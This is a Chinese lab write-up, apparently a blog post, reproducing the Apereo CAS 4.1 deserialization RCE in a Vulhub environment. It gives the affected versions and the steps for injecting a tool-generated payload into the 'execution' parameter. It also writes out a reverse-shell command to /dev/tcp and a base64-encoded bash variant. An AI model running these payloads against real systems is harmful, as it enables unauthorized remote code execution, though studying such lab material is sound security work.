其他
{Vulhub漏洞复现(二) Apereo CAS}
点击上方蓝字,发现更多精彩
Apereo CAS 4.1
反序列化RCE漏洞
01
漏洞简述
Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行反序列化的过程中存在一个问题,该案例引起了RCE漏洞。Apereo Cas一般是用来做身份认证的,所以有一定的攻击面,漏洞的成因是因为key的默认硬编码,导致可以通过反序列化配合Gadget使用。
02
影响版本
Apereo CAS <= 4.1.7
03
测试环境
目标机:192.168.234.128
攻击机:192.168.234.129
04
漏洞复现
Vulhub搭建->访问http://192.168.234.128:8080/cas/login->成功
1、利用apereo-cas-attack-1.0-SNAPSHOT-all.jar工具
生成payload
2、抓取登录接口数据包修改execution
参数为生成的payload
3、成功创建
4、反弹shell
/bin/bash -i > /dev/tcp/xx.xx.xx.xx/6666 0<&1 2>&1
需要base64编码
bash -c {echo,L2Jpbi9iYXNoIC1pID4gL2Rldi90Y3AvMTkyLjE2OC4yMzQuMTI5LzY2NjYgMDwmMSAyPiYx}|{base64,-d}|{bash,-i}
生成payload
进行攻击
反弹成功
05
参考链接
https://www.cnblogs.com/cute-puli/p/14648859.html
关注我
获得更多精彩
坚持学习与分享,麻烦各位师傅文章底部给点个“再看”,感激不尽
如侵权请私聊公众号删文